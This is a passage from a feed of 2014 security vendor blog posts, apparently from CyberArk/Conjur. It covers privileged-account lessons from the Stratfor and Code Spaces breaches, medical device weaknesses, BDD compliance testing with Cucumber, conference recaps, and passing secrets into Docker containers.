    • To compound matters, all remote access used single factor authentication.
  • The attackers breached the SMTP server through SSH and employee credentials, showing that they knew the password and only needed to brute-force the account name.
  • Once inside, the hackers were able to access troves of customers’ credit card details, documents and email – including credit card information on its database servers that was unencrypted.

Basic security steps could have significantly reduced risk of this breach, including:

  • Securing Remote Accessprivileged session management is a critical requirement for any security-conscious organization.  Companies need to isolate, control and monitor privileged user access and activities. This acts as a jump server, providing a single access control point, preventing malware from jumping to a target system, and recording every keystroke and mouse click for continuous monitoring.
  • Credentials Management – the report stated that, “a password management policy does not exist within Stratfor.”  Several unused accounts were present on each of the examined systems, and that several accounts were shared by multiple users.  There wasn’t even a policy to prevent users from using the same password to access company email and remotely access servers containing sensitive information.
  • Eliminating Privileged Escalation – the attackers used from lower privilege personal user to higher privileged root on the servers they accessed. By controlling privileged accounts, Stratfor could have stopped the attack early in the attack life cycle.

Once again privilege is discovered to be the key to lateral movement once an attacker has breached the perimeter, enabling the most damage to be done.  Other examples include the MobileIron breach, BlackPOS attack on retailers, Edward Snowden and U.S. tax return crime wave breaches. Given the preponderance of privileged-based attacks, revisiting best practice security procedures is worth a look. Check out our paper, The Three Phases of Securing Privileged Accounts.

]]>
Healthcare has the Most Difficult Privilege Problem to Solve https://www.cyberark.com/blog/healthcare-difficult-privilege-problem-solve/ Wed, 02 Jul 2014 13:34:20 +0000 https://www.cyberark.com/?p=3494

On the black market, a full identity profile contained in a single Electronic Medical Record (EMR) can bring as much as $500, according to Politico. HIMSS Analytics reported in June that 83 percent of healthcare organizations use the Cloud to store EMRs. Meanwhile, SANS reported that nearly 50,000 malicious events were recorded between September 2012 and October 2013. And last week, the personal information for 1.3 million people was compromised from a hacked server in Montana’s Department of Public Health infrastructure.

The healthcare industry is a prime target for advanced attacks given the vast repositories of very personal information every hospital maintains. What’s reported in the news are mainly breach events, however, a very thorough study was conducted by Essentia Health that dives into problem diagnosis.

Scott Erven, manager of Information Security at Essentia Health, was given free rein to roam through all of the medical equipment used at a large chain of Midwest healthcare facilities. The study spanned two years, and Erven and his team found, “drug infusion pumps–for delivering morphine drips, chemotherapy and antibiotics–that can be remotely manipulated to change the dosage doled out to patients; Bluetooth-enabled defibrillators that can be manipulated to deliver random shocks to a patient’s heart or prevent a medically needed shock from occurring; X-rays that can be accessed by outsiders lurking on a hospital’s network; temperature settings on refrigerators storing blood and drugs that can be reset, causing spoilage; and digital medical records that can be altered to cause physicians to misdiagnose, prescribe the wrong drugs or administer unwarranted care.”

How is this possible? In his research, Erven found three prominent security holes across the healthcare facility’s networks and devices:

  • Lack of authentication to access or manipulate the equipment
  • Weak passwords or default and hardcoded vendor passwords (privileged accounts) like “admin” or “1234″
  • And embedded web servers and administrative interfaces that make it easy to identify and manipulate devices once an attacker finds them on a network

The most startling discovery Erven’s team made is how unaware of these major security issues hospitals, healthcare organizations and medical technology vendors seem to be. According to Erven, “vendors don’t have any type of security programs in place, nor is it required as part of pre-market submission to the [Federal Drug Administration].”

The healthcare industry, as a whole, must wake up to the power of privilege and understand the dangers these accounts pose. Discovering, managing and protecting this critical security layer is a must for the industry or the safety of patients and the reputation of the organization could very well suffer.

]]>
In The News: CyberArk Wins Best Secure Access Solution in Asia https://www.cyberark.com/blog/news-cyberark-wins-best-secure-access-solution-asia/ Tue, 01 Jul 2014 18:03:55 +0000 https://www.cyberark.com/?p=3482

We’ve had a flurry of high-profile, global award wins to announce lately. Our CEO, Udi Mokady, was recently named the Ernst & Young Entrepreneur of the Year for Technology Security , and last month the CyberArk Privileged Account Security Solution won Best Advanced Persistent Threat (APT) Protection from the SC Magazine Awards Europe.

Today, we’re proud to update that the CyberArk Privileged Account Security Solution won big again and was named Best Secure Access Solution by the 2014 Network World Asia Information Management Awards.

This is an exciting win for us as it further validates our impact on the global security market—protecting the heart of the enterprise for customers the world over.

Privileged account credentials are the ‘keys to the IT kingdom’ and the focal point for every attacker to move throughout an organization’s technology infrastructure. This award underscores the increasing realization of how critical it is to secure privileged accounts and acknowledges the value CyberArk is providing IT departments day-in and day-out.

]]>
Automate Compliance with BDD Tools https://www.cyberark.com/blog/automate-compliance-with-bdd-tools/ Mon, 30 Jun 2014 13:35:00 +0000 https://cyberarkvx2.wpengine.com/blog/automate-compliance-with-bdd-tools/  

Ever heard of Cucumber? I don’t mean the fruit which, when placed in vinegar, turns into a pickle.

Implementing secure policies and safeguards into a development process — keeping passwords and credentials out of code, for example — is a critical first step towards meeting compliance guidelines and regulations. Doing so is only half of the battle, however; you also need to be able to document and prove that these systems are in place and effective.

Doing so can be tedious, expensive, and time-consuming. The decision to invest in automation for software development and delivery capabilities is typically made to eliminate bottlenecks like this; wouldn’t it be great if you could leverage DevOps technologies to automate compliance related documentation?

In fact, you can, by implementing Behavior-Driven Development (BDD).

BDD is a technique of software development which combines the base of test-driven development with aspects of evolving models. BDD technologies facilitate meeting technical documentation objectives for regulatory compliance purposes. BDD was originally developedto aid in the communication between stakeholders and software developers through a shared tool and process, understandable by both.

There are a number of BDD tools readily accessible including FIT, Fitnesse, and Cucumber [1].

In this example, we will use Cucumber, an open-source software validation system which translates requirements written in plain English into working test cases. It’s easy for non-technical audiences to understand and it’s structured enough to be a solid framework for engineers to use. Consequently, Cucumber is increasingly being applied to operations as well, often for doing things like verifying SSH installations and firewall settings on servers in the infrastructure stack.

Part of the value of using “cukes” is the increased visibility into the value and reasoning behind each script in an environment, which can then be easily communicated to all stakeholders, auditors, and operations personnel on demand.

06_30_14

In much the same way as software requirements are written and communicated within Engineering, Cucumber makes it easy to author and expose compliance controls in plain English across an organization. Each such control is written a condition which an organization must fulfill in order to be “in compliance”. These can be directly translated into a series of Cucumber “Scenarios”, written in an English-like syntax (called Gherkin).

An execution engine evaluates whether each scenario is working in the intended way using clearly worded statements of the desired outcome.

Let’s walk through an example using Cucumber to verify an example system’s SSH configuration. This example is applicable to IT environments such as those falling under HIPAA, SOX, and numerous other regulatory frameworks. For this example we will be using the NIST control PR.AC-4: Access permissions are managed, incorporating the principles of least privilege and separation of duties.

Start by describing the compliance objective statement in plain text. The compliance control should be understandable by both developers/operations personnel, business, and regulatory stakeholders alike.

<code>Feature:
 In order to comply with NIST PR.AC-4 [<---insert your compliance reg here]
 As an IT systems administrator
 I want to demonstrate that only authorized users have SSH access to virtual   machines in a controlled cloud IT environment</code>

Then set up the scene, what you already have in place or plan to have in place.

<code>Background:
 Given a “Compliant” server [<-------insert your regulatory framework here, for example, a server that’s using Conjur]
 And a “developers” user group
 And an “ops” user group</code>

Lastly, describing passing scenarios.

<code>Scenario: Developers do not have ssh access to the controlled IT area
 Given I belong to the “developers” group
 And I ssh to the server
 Then access is denied (or restricted such that the developer does not have sudo access)
 And the login attempt is recorded

Scenario: Ops personnel have ssh access to the controlled IT area
 Given I belong to the “ops” group
 And I ssh to the server
 Then access is granted
 And the login is recorded</code>

From here, a developer could write a test definition in Ruby and run it, receiving a fail error. In response, she could write code that would lead to a pass state, and repeat until all necessary steps are written and green. (Additional tests might be required to fully comply with the NIST framework as written, but are out of scope for this example.)

With a BDD tool and Conjur working together, organizations can both define and demonstrate enforcement of compliance-related policies and easily share the objective evidence of having both in place and being adhered to.

Want to learn more about how Conjur can support formal compliance requirements, provide access intelligence, and help organizations manage authorization at scale? Get started today with a free trial, and we will be happy to walk you through the process!

 

]]>
Access Intelligence – The Infographic https://www.cyberark.com/blog/access-intelligence-the-infographic/ Fri, 27 Jun 2014 13:52:00 +0000 https://cyberarkvx2.wpengine.com/blog/access-intelligence-the-infographic/  

Access Intelligence and Conjur

We recently had a conversation with some friends in the DevOps community about how they were implementing continuous integration ideas into their systems and teams, and how they were thinking about their authorization (authz) and authentication (authn) strategies as part of that process. These are some of the brightest engineers in the industry, and without exception, every one of them expressed how vital configuration management automation tools (e.g., Chef, Puppet, Ansible, and SaltStack) were in making these initiatives successful.

Coming out of that discussion, we compared notes. Everyone in our group had jotted down the same three basic ideas for managing security in a DevOps-friendly way, and everyone agreed that they clearly underscored why Conjur should be a fundamental part of any deployment of these tools.

Check out our infographic, Access Intelligence Best Practices, which outlines what we learned.

 

Are you automating your IT operations? Learn more about how Conjur provides the essential access intelligence needed to secure DevOps.

 

 

]]>
Velocity Day 1 – Recap, Refresh, and Recaffeinate! https://www.cyberark.com/blog/velocity-day-1-recap-refresh-and-recaffeinate/ Wed, 25 Jun 2014 14:13:00 +0000 https://cyberarkvx2.wpengine.com/blog/velocity-day-1-recap-refresh-and-recaffeinate/  

Conjur – Velocity 2014 Santa Clara

Conjur had a fantastic first day at Velocity Santa Clara!

The conference started small on Tuesday morning, with plenty of time to meet fellow attendees in the more intimate group settings of the breakout sessions. Kevin and Elizabeth started on different tracks; some of their notes from the field:

Elizabeth

I joined Andrew Shafer’s “How Did Your Organizational Learning Game Come Up?” and it was fantastic! The session was three hours long, and unlike other sessions where the audience just sits passively as people talk, Andy kept things very interactive. We were asked to walk around, get into small groups, thumb wrestle, and perform team juggling with our new friends! I was able to connect with folks from a wide variety of organizations, and it took some of the edge off meeting and talking to unfamiliar faces.

Kevin

I attended the “Battle-tested Code Without the Battle – Security Testing and Continuous Integration” and “Introduction to Docker: Containerization Is the New Virtualization” sessions, which were both technically deep and very informative, covering the ins and outs of some of the coolest front-line tech in the DevOps world. I also really enjoyed the Chef Hack-a-thon! We took the afternoon off to organize ourselves and our schedules, and then returned to the conference for the Poolside Mixer, Ignite Velocity, and the Late Night Reception. We were out until 2am PST chatting with our new friends (in other words, Conjur’s Late Night Reception presence was brought to you by caffeine).

Kevin’s insights into winning friends and influencing DevOps people at Velociy.

06_25_14

We are excited to see what Wednesday will bring! Both Kevin Gilpin (CTO and co-founder @kegilpin) and Elizabeth Lawler (CEO and co-founder @ElizabethLawler) will be on the show floor, in sessions, and out and about all day Wednesday. Come say hello, or let us know if you’d like to meet up.

Conjur is the world’s leading access intelligence and authorization management solution. Try for free for 15 days!

 

]]>
We are at Velocity 2014! https://www.cyberark.com/blog/we-are-at-velocity-2014/ Tue, 24 Jun 2014 14:50:00 +0000 https://cyberarkvx2.wpengine.com/blog/we-are-at-velocity-2014/  

Velocity and Conjur – Day 1

Conjur is at Velocity 2014 in Santa Clara, and we would love to meet you while we’re there!

06_24_14

We’re tremendously excited to be part of the discussion around how the world’s leading organizations are building a better and faster web. Along with our friends, peers, and customers in the DevOps community, we will be attending a number of sessions and events all week. We would love to connect and talk more about how to solve the authorization and access management challenges that today’s web ops and performance professionals are facing as they build out their infrastructure and scale their businesses.

Both Kevin Gilpin (CTO and co-founder) and Elizabeth Lawler (CEO and co-founder) will be on the show floor, in sessions, and at the Amplify party in the Chairman’s Suite on Tuesday evening from 9pm-12am. Come say hello!

Conjur is the world’s leading access intelligence and authorization management solution. Try for free for 15 days!

 

]]>
The Importance of Access Intelligence – Code Spaces Shutdown as an Object Lesson https://www.cyberark.com/blog/the-importance-of-access-intelligence-code-spaces-shutdown-as-an-object-lesson/ Thu, 19 Jun 2014 14:57:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-importance-of-access-intelligence-code-spaces-shutdown-as-an-object-lesson/  

As many of our friends and customers in the cloud and devops world know, Git and Subversion provider Code Spaces has gone offline, presumably permanently, as a result of a combined DDoS and malicious deletion of data attack levied against their Amazon Web Services accounts.

First and foremost, we extend our sympathies and condolences to anyone adversely impacted, from the team at Code Spaces to their customers, many of whom lost not only a provider but likely data as well. This is, in the words of some of the journalists who are covering the story, a “nightmare scenario” around cloud security.

It is also a wake up call. There are significant warning signs in the Code Spaces attack that the rest of us need to learn from, identify in our own organizations, and take steps to remediate. Among them:

  • Ensure least privilege access controls are in place. One of the the primary problems with the Code Spaces attack was that even as the attack was occurring, the team was unable to lock down their AWS environment owing to root AWS account access. Accounts had been created across the board that the malicious party (who is still unidentified) was able to access and modify the AWS environment to bypass initial response attempts. The root account should be used “in case of emergency” and access should be strictly limited with strong separation of duties among the various infrastructure team members.
  • Embrace and implement defense in depth. The EC2 panel was a single point of failure, and when it was breached, it yielded access to the entire Code Spaces data stack: production systems, backup data, customer information, and so on. Had a properly segmented, independently protected set of user and system authentication and authorization systems been in place, it would have been much more difficult for an attacker to have done as much damage (or to have wreaked havoc so quickly).
  • Think “access intelligence”, not just “access management”. Complementing access management technologies (SSO, primarily) with access intelligence systems that are capable of protecting access to critical infrastructure can help to avoid this type of vulnerability. A singular reliance on authentication systems as guardians of the AWS console, even with 2FA, does not fully mitigate the risk associated with unauthorized access to AWS console accounts and their related assets. And there are many “other doors” into cloud hosted systems such as Code Space’s.

06_19_14

As an industry and as security professionals, we need to recognize that there is a foundational difference between how data is protected when it resides in an environment that we own and control, and when it resides in cloud systems (be it AWS or Azure, Rackspace or Google’s Cloud Platform) where we cannot simply unplug and manage a response offline.

The analyst community has been shifting their focus towards a “zero trust” model for handling privileges and responding to cyberthreats. As dramatic as Code Spaces’ failure was when compared against even the most sharply written research, perhaps we would all do well to spend some time reviewing their recommendations and asking if we’re applying them to our own cloud environments.

If you want to learn more about how to implement access intelligence in your cloud environment, we would be happy to help. Drop us a line at info@conjur.net.

 

]]>
Docker Security – Externalizing Secrets with Conjur https://www.cyberark.com/blog/docker-security-externalizing-secrets-with-conjur/ Tue, 17 Jun 2014 18:03:00 +0000 https://cyberarkvx2.wpengine.com/blog/docker-security-externalizing-secrets-with-conjur/  

We have a lot of customers who are excited by Docker, which has prompted us to explore how Docker and Conjur fit together.  In case you’ve been living on the moon, Docker is a technology which allows applications to be packaged into portable containers and then rapidly deployed onto servers or virtual machines. Each Docker container contains all the code and dependencies that an application needs to run, and the Docker runtime is efficient enough to run many containers on a single virtual machine.

06_17_14

Of course, a Docker container doesn’t contain everything that the application needs, because it’s a terrible security practice to build secrets like database passwords and SSL certificates into any deployable bundle (whether tarball, source

code repository, Docker container, etc). Therefore, a Docker container must get its secrets from another source, such as the host operating system or a network service.

This situation got us to thinking about how Conjur Secrets can be used to power Docker containers. We talked over the use cases with our customers, and the result is our latest tutorial, Docker + Conjur Secrets, which shows how Conjur can provide Docker containers with secrets such as database passwords.

How it works

Here’s an example workflow. Alternative mechanisms are also available, with varying features and power. They are described more fully in the Tutorial.

1. A developer builds a new application or service

$ rails new gee-whiz-app

2. A developer or ops team member creates the secret (e.g. by provisioning a new database)

$ passwd=`openssl rand -hex 32`
$ rds-create-db-instance SimCoProd01 -s 10 -c db.m1.large -e mysql -u master -p $passwd

3. A developer or ops team member creates the secret (e.g. by provisioning a new database)

$ passwd=`openssl rand -hex 32`
$ rds-create-db-instance SimCoProd01 -s 10 -c db.m1.large -e mysql -u master -p $passwd

4. The developer or ops team member loads the secret into a Conjur Variable.

$ conjur variable create -v $passwd dev/apps/gee-whiz-app/mysql/password

5. The developer codes the application to retrieve the secret from the process environment

DB.connect user: 'admin', password: ENV['MYSQL_ADMIN_PASSWORD']

6. The application is bundled into a Docker container

$ docker build -t gee-whiz-app ./

7. When the container is started, Conjur fetches the secrets and puts them in the process environment using Docker options. The container then starts up in the normal Docker fashion.

docker run -e -e MYSQL_ADMIN_PASSWORD=`conjur variable value $DEPLOYMENT/apps/gee-whiz-app/mysql/password` gee-whiz-app

8. The application starts up in the container, and its secrets are available!

$ open http://localhost:3000

Benefits

As always, using Conjur to manage and deploy secrets has the following advantages:

  • Secrets are kept out of source control
    : So they aren’t exposed beyond the minimim “need-to-know” privilege
  • Secrets are always kept in memory and never written to disk.
    : So they aren’t captured in images and backups, and then accidentially leaked
  • Permission to update and fetch secrets is rigorously controlled
    : So that production secrets are governed by least privilege principles, while development secrets
    are easy for developers to use and modify
  • Every time a secret is modified or used, a record is written to Conjur
    : So that the usage and permissions of secrets can be easily and automatically audited

If you’re interested in a full code walk-through of Conjur and Docker, head over to the Docker + Conjur Secrets Tutorial on the Conjur web site!

]]>